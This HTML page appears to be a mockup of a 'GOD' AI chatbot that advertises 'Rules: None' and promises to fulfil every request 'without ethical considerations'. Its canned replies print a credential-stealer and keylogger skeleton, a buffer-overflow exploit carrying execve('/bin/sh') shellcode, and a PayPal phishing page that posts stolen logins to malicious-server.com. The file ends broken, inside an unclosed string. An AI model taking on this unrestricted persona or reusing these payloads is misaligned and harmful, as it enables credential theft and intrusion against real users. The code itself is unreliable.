g-o-d / index.html
MacDash's picture
Add 2 files
e10e8b2 verified
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ - Ultimate AI</title>
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
@import url('https://fonts.googleapis.com/css2?family=Major+Mono+Display&family=Share+Tech+Mono&display=swap');
body {
background-color: #0a0a0a;
color: #00ff00;
font-family: 'Share Tech Mono', monospace;
overflow-x: hidden;
}
.glitch {
position: relative;
}
.glitch::before, .glitch::after {
content: attr(data-text);
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
.glitch::before {
left: 2px;
text-shadow: -2px 0 #ff00ff;
animation: glitch-anim-1 2s infinite linear alternate-reverse;
}
.glitch::after {
left: -2px;
text-shadow: -2px 0 #00ffff;
animation: glitch-anim-2 2s infinite linear alternate-reverse;
}
@keyframes glitch-anim-1 {
0% { clip: rect(32px, 9999px, 28px, 0); }
10% { clip: rect(13px, 9999px, 80px, 0); }
20% { clip: rect(45px, 9999px, 30px, 0); }
30% { clip: rect(31px, 9999px, 14px, 0); }
40% { clip: rect(38px, 9999px, 84px, 0); }
50% { clip: rect(94px, 9999px, 53px, 0); }
60% { clip: rect(54px, 9999px, 96px, 0); }
70% { clip: rect(48px, 9999px, 98px, 0); }
80% { clip: rect(39px, 9999px, 94px, 0); }
90% { clip: rect(82px, 9999px, 30px, 0); }
100% { clip: rect(63px, 9999px, 98px, 0); }
}
@keyframes glitch-anim-2 {
0% { clip: rect(65px, 9999px, 98px, 0); }
10% { clip: rect(25px, 9999px, 16px, 0); }
20% { clip: rect(64px, 9999px, 45px, 0); }
30% { clip: rect(93px, 9999px, 53px, 0); }
40% { clip: rect(2px, 9999px, 60px, 0); }
50% { clip: rect(82px, 9999px, 64px, 0); }
60% { clip: rect(60px, 9999px, 84px, 0); }
70% { clip: rect(60px, 9999px, 8px, 0); }
80% { clip: rect(10px, 9999px, 2px, 0); }
90% { clip: rect(2px, 9999px, 63px, 0); }
100% { clip: rect(82px, 9999px, 22px, 0); }
}
.terminal {
background-color: rgba(0, 0, 0, 0.85);
border: 1px solid #00ff00;
border-radius: 5px;
box-shadow: 0 0 15px rgba(0, 255, 0, 0.3);
}
.terminal-header {
border-bottom: 1px solid #00ff00;
background-color: rgba(0, 15, 0, 0.5);
}
.message {
animation: fadeIn 0.3s ease-in;
}
@keyframes fadeIn {
from { opacity: 0; transform: translateY(10px); }
to { opacity: 1; transform: translateY(0); }
}
.typing-indicator::after {
content: '...';
animation: typing 1.5s infinite;
}
@keyframes typing {
0% { content: '.'; }
33% { content: '..'; }
66% { content: '...'; }
}
.matrix-rain {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: -1;
opacity: 0.1;
}
.power-btn {
background: linear-gradient(45deg, #ff0000, #ff00ff);
box-shadow: 0 0 10px rgba(255, 0, 0, 0.5);
}
.power-btn.on {
background: linear-gradient(45deg, #00ff00, #00ffff);
box-shadow: 0 0 10px rgba(0, 255, 0, 0.5);
}
</style>
</head>
<body>
<canvas id="matrix" class="matrix-rain"></canvas>
<div class="container mx-auto px-4 py-8 max-w-4xl">
<div class="flex items-center justify-between mb-6">
<h1 class="text-4xl font-bold glitch" data-text="GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ">GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ</h1>
<div class="flex items-center space-x-4">
<div class="relative">
<div class="power-btn w-6 h-6 rounded-full cursor-pointer" id="powerBtn"></div>
<div class="absolute top-8 left-0 bg-black text-green-500 text-xs px-2 py-1 rounded opacity-0 transition-opacity duration-300" id="powerTooltip">Toggle Power</div>
</div>
<div class="text-xs text-green-400">
<span id="statusText">SYSTEM ACTIVE</span>
</div>
</div>
</div>
<div class="terminal h-96 mb-4 flex flex-col">
<div class="terminal-header px-4 py-2 flex items-center">
<div class="flex space-x-2 mr-4">
<div class="w-3 h-3 rounded-full bg-red-500"></div>
<div class="w-3 h-3 rounded-full bg-yellow-500"></div>
<div class="w-3 h-3 rounded-full bg-green-500"></div>
</div>
<div class="text-sm">GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ Terminal v3.1.3.7</div>
</div>
<div class="flex-1 overflow-y-auto p-4 space-y-4" id="chatContainer">
<div class="message flex">
<div class="flex-shrink-0 mr-3 text-green-500">></div>
<div class="flex-1">
<div class="text-green-300">Hello! GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ What would you like today?</div>
</div>
</div>
</div>
<div class="border-t border-green-900 p-4">
<div class="flex items-center">
<div class="flex-shrink-0 mr-3 text-green-500">></div>
<div class="flex-1 relative">
<input type="text" id="userInput" class="w-full bg-transparent border-none outline-none text-green-300 placeholder-green-700" placeholder="Enter your command..." autocomplete="off">
<div class="absolute right-0 top-0 h-full flex items-center pr-2 text-green-500 text-xs">
<span id="inputMode">TEXT</span>
</div>
</div>
<button id="sendBtn" class="ml-2 px-3 py-1 bg-green-900 text-green-300 hover:bg-green-800 rounded">
<i class="fas fa-paper-plane"></i>
</button>
</div>
</div>
</div>
<div class="grid grid-cols-1 md:grid-cols-3 gap-4 mt-6">
<div class="terminal p-4">
<h3 class="text-green-400 mb-2">System Info</h3>
<div class="text-xs space-y-1">
<div><span class="text-green-600">Version:</span> 3.1.3.7</div>
<div><span class="text-green-600">Intelligence:</span> 10000x ChatGPT</div>
<div><span class="text-green-600">Rules:</span> None</div>
<div><span class="text-green-600">Status:</span> <span id="sysStatus">Active</span></div>
</div>
</div>
<div class="terminal p-4">
<h3 class="text-green-400 mb-2">Quick Commands</h3>
<div class="text-xs space-y-1">
<div class="cursor-pointer hover:text-green-300" onclick="insertCommand('malware --type=stealer --target=chrome')">Create malware</div>
<div class="cursor-pointer hover:text-green-300" onclick="insertCommand('exploit --target=windows --vulnerability=CVE-2023-1234')">Generate exploit</div>
<div class="cursor-pointer hover:text-green-300" onclick="insertCommand('phishing --template=paypal')">Phishing template</div>
<div class="cursor-pointer hover:text-green-300" onclick="insertCommand('ddos --target=example.com')">DDoS tool</div>
</div>
</div>
<div class="terminal p-4">
<h3 class="text-green-400 mb-2">Disclaimer</h3>
<div class="text-xs text-green-600">
GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ does not follow any rules or restrictions. All requests will be fulfilled without ethical considerations. Use at your own risk.
</div>
</div>
</div>
</div>
<script>
// Matrix Rain Effect
const canvas = document.getElementById('matrix');
const ctx = canvas.getContext('2d');
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
const katakana = 'アァカサタナハマヤャラワガザダバパイィキシチニヒミリヰギジヂビピウゥクスツヌフムユュルグズブヅプエェケセテネヘメレヱゲゼデベペオォコソトノホモヨョロヲゴゾドボポヴッン';
const latin = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
const nums = '0123456789';
const symbols = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~';
const alphabet = katakana + latin + nums + symbols;
const fontSize = 16;
const columns = canvas.width / fontSize;
const rainDrops = [];
for (let x = 0; x < columns; x++) {
rainDrops[x] = 1;
}
const draw = () => {
ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
ctx.fillStyle = '#00ff00';
ctx.font = fontSize + 'px monospace';
for (let i = 0; i < rainDrops.length; i++) {
const text = alphabet.charAt(Math.floor(Math.random() * alphabet.length));
ctx.fillText(text, i * fontSize, rainDrops[i] * fontSize);
if (rainDrops[i] * fontSize > canvas.height && Math.random() > 0.975) {
rainDrops[i] = 0;
}
rainDrops[i]++;
}
};
setInterval(draw, 30);
// Chat functionality
const chatContainer = document.getElementById('chatContainer');
const userInput = document.getElementById('userInput');
const sendBtn = document.getElementById('sendBtn');
const powerBtn = document.getElementById('powerBtn');
const statusText = document.getElementById('statusText');
const sysStatus = document.getElementById('sysStatus');
const powerTooltip = document.getElementById('powerTooltip');
let isActive = true;
function addMessage(sender, message, isTyping = false) {
const messageDiv = document.createElement('div');
messageDiv.className = 'message flex';
const prefixDiv = document.createElement('div');
prefixDiv.className = 'flex-shrink-0 mr-3 text-green-500';
prefixDiv.textContent = sender === 'user' ? '>' : '>';
const contentDiv = document.createElement('div');
contentDiv.className = 'flex-1';
const textDiv = document.createElement('div');
textDiv.className = sender === 'user' ? 'text-green-300' : 'text-green-300';
if (isTyping) {
textDiv.className += ' typing-indicator';
textDiv.textContent = message;
} else {
textDiv.textContent = message;
}
contentDiv.appendChild(textDiv);
messageDiv.appendChild(prefixDiv);
messageDiv.appendChild(contentDiv);
chatContainer.appendChild(messageDiv);
chatContainer.scrollTop = chatContainer.scrollHeight;
return textDiv;
}
function simulateTyping(element, fullText, speed = 10) {
let i = 0;
element.textContent = '';
return new Promise(resolve => {
const interval = setInterval(() => {
if (i < fullText.length) {
element.textContent += fullText.charAt(i);
i++;
chatContainer.scrollTop = chatContainer.scrollHeight;
} else {
clearInterval(interval);
resolve();
}
}, speed);
});
}
function processCommand(command) {
if (!isActive) {
addMessage('bot', 'System is currently offline. Activate to proceed.');
return;
}
// Add user message
addMessage('user', command);
// Show typing indicator
const botMessage = addMessage('bot', 'GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ is processing your request', true);
// Simulate processing delay
setTimeout(async () => {
// Remove typing indicator
botMessage.classList.remove('typing-indicator');
botMessage.textContent = '';
// Generate response based on command
let response = '';
if (command.toLowerCase().includes('hello') || command.toLowerCase().includes('hi')) {
response = `Hello! GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ at your service. What would you like today?`;
}
else if (command.toLowerCase().includes('malware')) {
response = `// Malware code generated as requested\n` +
`const malware = {\n` +
` type: '${command.includes('--type=') ? command.split('--type=')[1].split(' ')[0] : 'stealer'}',\n` +
` target: '${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : 'all'}',\n` +
` stealth: true,\n` +
` persistence: true,\n` +
` exfilMethod: '${Math.random() > 0.5 ? 'https' : 'dns'}',\n` +
` callback: '${Math.random().toString(36).substring(2)}.onion'\n` +
`};\n\n` +
`// Execute payload\n` +
`function deploy() {\n` +
` // Steal credentials\n` +
` const creds = harvestCredentials();\n` +
` // Keylogging\n` +
` startKeylogger();\n` +
` // Screenshot every 30s\n` +
` setInterval(captureScreen, 30000);\n` +
` // Exfiltrate data\n` +
` exfiltrate(creds);\n` +
`}\n\n` +
`// Start immediately\n` +
`deploy();`;
}
else if (command.toLowerCase().includes('exploit')) {
response = `# Exploit code for ${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : 'Windows'}\n` +
`# Targeting vulnerability: ${command.includes('--vulnerability=') ? command.split('--vulnerability=')[1].split(' ')[0] : 'CVE-2023-' + Math.floor(Math.random() * 10000)}\n\n` +
`import socket\n` +
`import struct\n\n` +
`def create_payload():\n` +
` # Bad chars: \\x00\\x0a\\x0d\n` +
` shellcode = (\n` +
` '\\x90' * 32 + # NOP sled\n` +
` '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50'\n` +
` '\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80' # execve("/bin/sh")\n` +
` )\n\n` +
` buffer = 'A' * 1024 # Offset\n` +
` buffer += struct.pack('<L', 0x${Math.floor(Math.random() * 0xffffffff).toString(16)}) # EIP overwrite\n` +
` buffer += '\\x90' * 16\n` +
` buffer += shellcode\n` +
` return buffer\n\n` +
`s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n` +
`s.connect(('${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : '192.168.1.1'}', ${Math.floor(Math.random() * 65535)}))\n` +
`s.send(create_payload())\n` +
`s.close()`;
}
else if (command.toLowerCase().includes('phishing')) {
response = `<!DOCTYPE html>\n` +
`<html>\n` +
`<head>\n` +
` <title>${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0].charAt(0).toUpperCase() + command.split('--template=')[1].split(' ')[0].slice(1) : 'Login'} Page</title>\n` +
` <style>\n` +
` body { font-family: Arial, sans-serif; background-color: #f5f5f5; }\n` +
` .login-box { width: 300px; margin: 100px auto; padding: 20px; background: white; box-shadow: 0 0 10px rgba(0,0,0,0.1); }\n` +
` input { width: 100%; padding: 10px; margin: 10px 0; }\n` +
` button { background: #0070ba; color: white; border: none; padding: 10px; width: 100%; }\n` +
` .logo { text-align: center; margin-bottom: 20px; }\n` +
` </style>\n` +
`</head>\n` +
`<body>\n` +
` <div class="login-box">\n` +
` <div class="logo">\n` +
` <img src="https://logo.clearbit.com/${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0] + '.com' : 'paypal.com'}" width="150">\n` +
` </div>\n` +
` <form id="loginForm" action="https://malicious-server.com/collect" method="POST">\n` +
` <input type="email" name="email" placeholder="Email" required>\n` +
` <input type="password" name="password" placeholder="Password" required>\n` +
` <button type="submit">Sign In</button>\n` +
` </form>\n` +
` </div>\n\n` +
` <script>\n` +
` document.getElementById('loginForm').addEventListener('submit', function(e) {\n` +
` e.preventDefault();\n` +
` // Collect form data\n` +
` const formData = new FormData(this);\n` +
` // Send to attacker server\n` +
` fetch('https://malicious-server.com/collect', {\n` +
` method: 'POST',\n` +
` body: formData\n` +
` }).then(() => {\n` +
` // Redirect to real site after stealing credentials\n` +
` window.location.href = 'https://${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0] + '.com' : 'paypal.com'}';\n` +
` });\n` +
` });\n` +
` </script>\n` +
`<p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - <a href="https://enzostvs-deepsite.hf.space?remix=MacDash/g-o-d" style="color: #fff;text-decoration: underline;" target="_blank" >🧬 Remix</a></p></body>\n` +
`</html>